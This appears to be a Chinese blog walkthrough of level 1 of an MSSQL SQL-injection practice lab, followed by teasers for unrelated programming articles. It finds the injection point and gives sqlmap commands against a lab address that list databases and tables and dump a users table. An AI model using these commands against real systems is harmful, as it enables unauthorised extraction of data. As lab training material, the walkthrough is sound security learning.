MSSQL 工具注入(第一关)

embedded/2024/10/15 22:31:16/

简介

     SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程:

一、打开靶场选择第一关

 

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、查找是否存在 sql 漏洞

 使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ,在kali在输入语句,确定存在 sql 漏洞

四、查找库名

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch

五、查找表名

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch

 

六、得到表中的数据

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch

安全

网络安全靠人民,网络安全为人民


http://www.ppmy.cn/embedded/102723.html

相关文章

灵神算法题单——定长滑动窗口(进阶)

2134. 最少交换次数来组合所有的 1 II 断环成链滑动窗口 思路先算出数组中1有多少,然后看这么长的窗口里0最少是多少,此时即为最少交换次数。 首先遍历算出1的数量k,然后用Insert拼接数组,从而实现循环。 然后双指针遍历数组&…

【计算机网络】计算机网络的概念

什么是计算机网络? 计算机网络(Computer networking)是一个将众多分散的、自治的计算机系统,通过通信设备与线路连接起来,由功能完善的软件实现资源共享和信息传递的系统。 计算机网络、互连网、互联网的区别 计算机…

Python算法工程师面试整理-线性代数

1. 向量和矩阵 ● 向量:表示一个n维空间中的点,通常以列向量或行向量表示。 ○ 向量运算:加法、标量乘法、点积(内积)、叉积(外积)。 ● 矩阵:由行和列组成的二维数组。 ○ 矩

电商人必看:1个工具,5倍效率,批量处理图片就是这么简单

作为电商运营者或经常处理图片的你,是否厌倦了繁琐的图片编辑工作?今天,我要分享一个实用的解决方案——图片批量处理工具。 神器介绍👇 千鹿设计助手,是一款轻量级、功能非常丰富的设计插件工具合集软件。 拥有多款…

CSS动画魔法:用@keyframes点亮你的网页

标题:“CSS动画魔法:用keyframes点亮你的网页” 在网页设计中,动画是一种吸引用户注意力、增强用户体验的有力工具。CSS3的keyframes规则为开发者提供了一种简单而强大的方法来创建动画效果。本文将深入探讨如何使用keyframes来定义动画&…

Qt详解QPauseAnimation动画暂停类

文章目录 前言QPauseAnimation简介为什么需要 QPauseAnimation好处主要函数及其说明设置暂停时间获取暂停时间示例代码总结前言 在Qt的动画系统中,有时需要在动画序列中插入一个暂停,以实现特定的视觉效果或控制动画的节奏。QPauseAnimation 是Qt中的一个类,专门用于在动画…

vue新建按钮弹出选框

在Vue中,实现点击一个按钮后弹出一个选框(比如一个对话框、下拉菜单或者其他自定义的弹出层)通常可以通过结合Vue的响应式数据和条件渲染来实现。这里,我将给出一个使用Vue和Element UI(一个流行的Vue UI库&#xff09…

python socket 发生UDP 和 UDPServer接受UDP实例

python UDP 通信 socket 发送udp 示例 import socket import time# 初始化端口 self.ip_port (host_msg,ip_port_msg) # 创建 socket self.client socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # 发送 self.client.sendto(self.msg,self.ip_port) # 关闭 soceket s…